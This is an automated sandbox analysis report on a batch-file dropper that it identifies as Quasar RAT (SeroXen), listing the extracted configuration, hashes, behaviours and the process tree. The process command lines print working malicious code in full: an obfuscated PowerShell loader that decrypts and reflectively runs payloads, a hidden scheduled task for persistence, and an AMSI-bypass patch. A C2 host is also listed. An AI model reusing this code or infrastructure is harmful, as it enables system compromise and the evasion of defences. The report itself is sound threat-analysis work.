Overview

overview

10

Static

static

1

tKs7nbI.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    12s
  • max time network
    18s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-05-2024 16:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    tKs7nbI.bat

  • Size

    1003KB

  • MD5

    a9c91096bbb037810b2cc22d81e8d95d

  • SHA1

    ea3929bc88ca4c0c943b3f0522cacfbbb9de6b4d

  • SHA256

    cc31f9abb4a23b7d94d6f17b23351d1ee4302fa779b627aa35c24dbf17ec7a5c

  • SHA512

    ed4cba44fed44fbcc381e01d83d42e0ed667bd0922170db56a52a041e3557380b48e84b161cc389cdf69c8dd86c873b31828798acfc738e6ce8a89fa86b2ca64

  • SSDEEP

    24576:Xh3RydALrdPnUJBuvYf0xlLpv33P5ShWAceU7:pgdALFnduOvHPIw7

Score
10/10
quasarv3.1.5 | seroxenexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Extracted

Family

quasar

Version

3.1.5

Botnet

v3.1.5 | SeroXen

C2

runderscore00-25501.portmap.host:25501

Mutex

$Sxr-jy6vh8CtEJL5ceZuIb

Attributes
  • encryption_key

    RqhtG6daCh0jt3avVuLQ

  • install_name

    $77-powershell.exe

  • log_directory

    $77-Logs

  • reconnect_delay

    3000

  • startup_key

    $77-Powershell

  • subdirectory

    $77-SeroXen

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tKs7nbI.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4844
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EzZCuv/s/LdLTjOYcARiLxGBm9rfHMdRaLX4Ui91Anc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('77fg37BHNG4BTjejbJsU0w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WAbrC=New-Object System.IO.MemoryStream(,$param_var); $MFRbt=New-Object System.IO.MemoryStream; $RvLRM=New-Object System.IO.Compression.GZipStream($WAbrC, [IO.Compression.CompressionMode]::Decompress); $RvLRM.CopyTo($MFRbt); $RvLRM.Dispose(); $WAbrC.Dispose(); $MFRbt.Dispose(); $MFRbt.ToArray();}function execute_function($param_var,$param2_var){ $NQMVh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YkEwf=$NQMVh.EntryPoint; $YkEwf.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\tKs7nbI.bat';$GiqXC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\tKs7nbI.bat').Split([Environment]::NewLine);foreach ($TFNwv in $GiqXC) { if ($TFNwv.StartsWith(':: ')) { $wHVSL=$TFNwv.Substring(3); break; }}$payloads_var=[string[]]$wHVSL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:912
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_92_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_92.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2776
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_92.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3916
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_92.bat" "
          4⤵
            PID:2772
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EzZCuv/s/LdLTjOYcARiLxGBm9rfHMdRaLX4Ui91Anc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('77fg37BHNG4BTjejbJsU0w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WAbrC=New-Object System.IO.MemoryStream(,$param_var); $MFRbt=New-Object System.IO.MemoryStream; $RvLRM=New-Object System.IO.Compression.GZipStream($WAbrC, [IO.Compression.CompressionMode]::Decompress); $RvLRM.CopyTo($MFRbt); $RvLRM.Dispose(); $WAbrC.Dispose(); $MFRbt.Dispose(); $MFRbt.ToArray();}function execute_function($param_var,$param2_var){ $NQMVh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YkEwf=$NQMVh.EntryPoint; $YkEwf.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_92.bat';$GiqXC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_92.bat').Split([Environment]::NewLine);foreach ($TFNwv in $GiqXC) { if ($TFNwv.StartsWith(':: ')) { $wHVSL=$TFNwv.Substring(3); break; }}$payloads_var=[string[]]$wHVSL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
              5⤵
              • Command and Scripting Interpreter: PowerShell
              PID:1840
              • C:\Users\Admin\AppData\Local\Temp\$77-powershell.exe
                "C:\Users\Admin\AppData\Local\Temp\$77-powershell.exe"
                6⤵
                  PID:5028
                • C:\Users\Admin\AppData\Local\Temp\Install.exe
                  "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                  6⤵
                    PID:3076
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ZTexeezkqLAI{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cklzFXILhUaWvf,[Parameter(Position=1)][Type]$AnpjsEksyP)$sRBnGItkjIq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+'le'+'c'+'t'+'e'+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+'e'+''+[Char](109)+''+[Char](111)+'ry'+'M'+''+[Char](111)+'d'+[Char](117)+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+'P'+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+''+'e'+''+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+'C'+'la'+'s'+''+[Char](115)+'',[MulticastDelegate]);$sRBnGItkjIq.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+'c'+'i'+'a'+'l'+'N'+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+'e'+'ByS'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$cklzFXILhUaWvf).SetImplementationFlags(''+'R'+''+[Char](117)+'nt'+'i'+'me'+','+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$sRBnGItkjIq.DefineMethod('I'+'n'+''+[Char](118)+''+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+'l'+''+'i'+'c'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+'Slo'+[Char](116)+''+[Char](44)+'Vi'+'r'+'tu'+'a'+''+[Char](108)+'',$AnpjsEksyP,$cklzFXILhUaWvf).SetImplementationFlags('R'+'u'+'n'+'t'+'i'+'m'+''+'e'+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $sRBnGItkjIq.CreateType();}$ZQQEbwmHRfCae=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+''+'.'+''+'d'+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+'c'+[Char](114)+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+''+'n'+''+'s'+'a'+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+'iv'+'e'+''+[Char](77)+''+[Char](101)+'t'+[Char](104)+''+[Char](111)+'ds');$MWfHQpsnBRQOXR=$ZQQEbwmHRfCae.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+'d'+''+[Char](100)+''+'r'+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+'t'+'a'+'t'+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$yASzvZVfgViYUrZelyS=ZTexeezkqLAI @([String])([IntPtr]);$ZIEpJwFmRoIfbFgyoZzMsh=ZTexeezkqLAI @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FAAWBYMohjw=$ZQQEbwmHRfCae.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+'u'+'l'+'eH'+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'e'+'l'+''+'3'+''+[Char](50)+''+'.'+'d'+'l'+''+'l'+'')));$mBWfgWcMPoNleF=$MWfHQpsnBRQOXR.Invoke($Null,@([Object]$FAAWBYMohjw,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+'r'+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$tFoPCGcLjnDLDkejN=$MWfHQpsnBRQOXR.Invoke($Null,@([Object]$FAAWBYMohjw,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+'l'+'P'+''+[Char](114)+''+'o'+'t'+'e'+'ct')));$AvEsKWo=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mBWfgWcMPoNleF,$yASzvZVfgViYUrZelyS).Invoke(''+[Char](97)+''+'m'+'s'+'i'+''+'.'+'d'+[Char](108)+''+[Char](108)+'');$VizAGEDFTCnHODvbN=$MWfHQpsnBRQOXR.Invoke($Null,@([Object]$AvEsKWo,[Object](''+[Char](65)+''+[Char](109)+'s'+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+[Char](101)+'r')));$fKCrQyBvPN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tFoPCGcLjnDLDkejN,$ZIEpJwFmRoIfbFgyoZzMsh).Invoke($VizAGEDFTCnHODvbN,[uint32]8,4,[ref]$fKCrQyBvPN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$VizAGEDFTCnHODvbN,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tFoPCGcLjnDLDkejN,$ZIEpJwFmRoIfbFgyoZzMsh).Invoke($VizAGEDFTCnHODvbN,[uint32]8,0x20,[ref]$fKCrQyBvPN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+'TW'+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+'s'+'t'+'a'+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
          1⤵
            PID:1640

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            55d32bc1c206428fe659912b361362de

            SHA1

            7056271e5cf73b03bafc4e616a0bc5a4cffc810f

            SHA256

            37bd9078411576470f38bed628682d66786194692355541cd16f323e8f17c1ff

            SHA512

            2602abc70c0ed7e5ba63a3c7190015c2b30aa3223fbbe65fd9ddc001e84ab393bb172a9488dd988cd6368d668ab8608f85dc03cdb7c9561e904e3f7ce103485c

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            17KB

            MD5

            3f860f4fa52ce5339fdb3f4254da5e08

            SHA1

            d9d15a52e87e1325c83aaf41f1ce4df4a9a5363a

            SHA256

            cb2d6aa81b76a9572e990e0348ad65a7f2d68262a09bfc67e146d0893d784d68

            SHA512

            42c009488c65019106bb8788104a04a498b8337083b756a68f917a2fd92cd2cdbca56909bb6de7200c01dc3144ddceac49d8482d176e17c133b5b75a58f8a066

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\$77-powershell.exe
            Filesize

            409KB

            MD5

            8eefe2610d68c55f25e924757c81f897

            SHA1

            6881d6a7ede26925ee3e18d42e28775c336c1f9c

            SHA256

            50d9e8606bf6db4ed46e3eec121e4f872fb0d5d50be756ee4f534d45ca58628d

            SHA512

            c67702f6432e7a34fdf928cd8587a25c60af74ed71e326614d2dff3a8415d458407e4de9ebd2cd95bf177f20ce6a00e610d08026f791cbc4cd16a086c35d00d6

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\Install.exe
            Filesize

            163KB

            MD5

            57cd755ffd48a9a5cc4489316217bf44

            SHA1

            9cde8eb1c28c0ef4f6144df2d753194dfd80c272

            SHA256

            971d9173dcad14d2b2829f84db331cb594ca3940009f1bde7bd171608a3a4a9d

            SHA512

            8a2a60d93cd2c2071c1f0b6c4fb768b1d2360e531be683b3b7df8ba87bb35d007660bccca5a6b4a51315632672b6e5fa80d7b14debc4445d9964a95013cc81e5

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cvbsy3oz.wgl.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Roaming\startup_str_92.bat
            Filesize

            1003KB

            MD5

            a9c91096bbb037810b2cc22d81e8d95d

            SHA1

            ea3929bc88ca4c0c943b3f0522cacfbbb9de6b4d

            SHA256

            cc31f9abb4a23b7d94d6f17b23351d1ee4302fa779b627aa35c24dbf17ec7a5c

            SHA512

            ed4cba44fed44fbcc381e01d83d42e0ed667bd0922170db56a52a041e3557380b48e84b161cc389cdf69c8dd86c873b31828798acfc738e6ce8a89fa86b2ca64

            Download Submit

          • C:\Users\Admin\AppData\Roaming\startup_str_92.vbs
            Filesize

            114B

            MD5

            10013464037a997b34c47f112495a9a5

            SHA1

            c36b2744b4a1bde2eb6bdbbd7c304b476eddd5b0

            SHA256

            1ba742a592b513407e6132e5347f2c651e1a23c54db696e97c0689971b4cac21

            SHA512

            2870d48c9e5e597c43640e2c1cf934eea0525910cf4402518ae856de570d2431d18eb8d2845c191ec66c92b3dabf24fed3a6e072bc0905f7dfa256072f18f8d8

            Download Submit

          • memory/912-19-0x0000000006820000-0x000000000686C000-memory.dmp

            Filesize

            304KB

            Download

          • memory/912-2-0x0000000005AB0000-0x00000000060D8000-memory.dmp

            Filesize

            6.2MB

            Download

          • memory/912-17-0x0000000006330000-0x0000000006684000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/912-18-0x00000000067F0000-0x000000000680E000-memory.dmp

            Filesize

            120KB

            Download

          • memory/912-0-0x00000000745CE000-0x00000000745CF000-memory.dmp

            Filesize

            4KB

            Download

          • memory/912-20-0x0000000008E40000-0x00000000094BA000-memory.dmp

            Filesize

            6.5MB

            Download

          • memory/912-21-0x0000000006DE0000-0x0000000006DFA000-memory.dmp

            Filesize

            104KB

            Download

          • memory/912-22-0x0000000006D70000-0x0000000006D78000-memory.dmp

            Filesize

            32KB

            Download

          • memory/912-23-0x0000000008880000-0x0000000008972000-memory.dmp

            Filesize

            968KB

            Download

          • memory/912-24-0x000000000AA70000-0x000000000B014000-memory.dmp

            Filesize

            5.6MB

            Download

          • memory/912-7-0x00000000062C0000-0x0000000006326000-memory.dmp

            Filesize

            408KB

            Download

          • memory/912-5-0x00000000058A0000-0x00000000058C2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/912-4-0x00000000745C0000-0x0000000074D70000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/912-3-0x00000000745C0000-0x0000000074D70000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/912-79-0x00000000745C0000-0x0000000074D70000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/912-1-0x0000000003310000-0x0000000003346000-memory.dmp

            Filesize

            216KB

            Download

          • memory/912-6-0x0000000006250000-0x00000000062B6000-memory.dmp

            Filesize

            408KB

            Download

          • memory/1640-105-0x000001E326500000-0x000001E326522000-memory.dmp

            Filesize

            136KB

            Download

          • memory/1840-85-0x0000000008410000-0x00000000084A2000-memory.dmp

            Filesize

            584KB

            Download

          • memory/1840-84-0x0000000008170000-0x00000000081DC000-memory.dmp

            Filesize

            432KB

            Download

          • memory/1840-104-0x0000000007FF0000-0x0000000008002000-memory.dmp

            Filesize

            72KB

            Download

          • memory/1840-113-0x000000000A2F0000-0x000000000A32C000-memory.dmp

            Filesize

            240KB

            Download

          • memory/1840-117-0x00000000083F0000-0x00000000083FA000-memory.dmp

            Filesize

            40KB

            Download

          • memory/2776-26-0x00000000745C0000-0x0000000074D70000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2776-52-0x00000000745C0000-0x0000000074D70000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2776-57-0x00000000745C0000-0x0000000074D70000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2776-56-0x0000000006FC0000-0x0000000006FD1000-memory.dmp

            Filesize

            68KB

            Download

          • memory/2776-55-0x0000000007060000-0x00000000070F6000-memory.dmp

            Filesize

            600KB

            Download

          • memory/2776-54-0x0000000006E10000-0x0000000006E1A000-memory.dmp

            Filesize

            40KB

            Download

          • memory/2776-53-0x00000000745C0000-0x0000000074D70000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2776-60-0x00000000745C0000-0x0000000074D70000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2776-51-0x0000000006C80000-0x0000000006D23000-memory.dmp

            Filesize

            652KB

            Download

          • memory/2776-45-0x00000000745C0000-0x0000000074D70000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2776-50-0x0000000006C60000-0x0000000006C7E000-memory.dmp

            Filesize

            120KB

            Download

          • memory/2776-27-0x00000000745C0000-0x0000000074D70000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/2776-39-0x00000000703E0000-0x000000007042C000-memory.dmp

            Filesize

            304KB

            Download

          • memory/2776-38-0x0000000006C20000-0x0000000006C52000-memory.dmp

            Filesize

            200KB

            Download

          • memory/2776-28-0x00000000745C0000-0x0000000074D70000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/5028-103-0x00000000003F0000-0x000000000045C000-memory.dmp

            Filesize

            432KB

            Download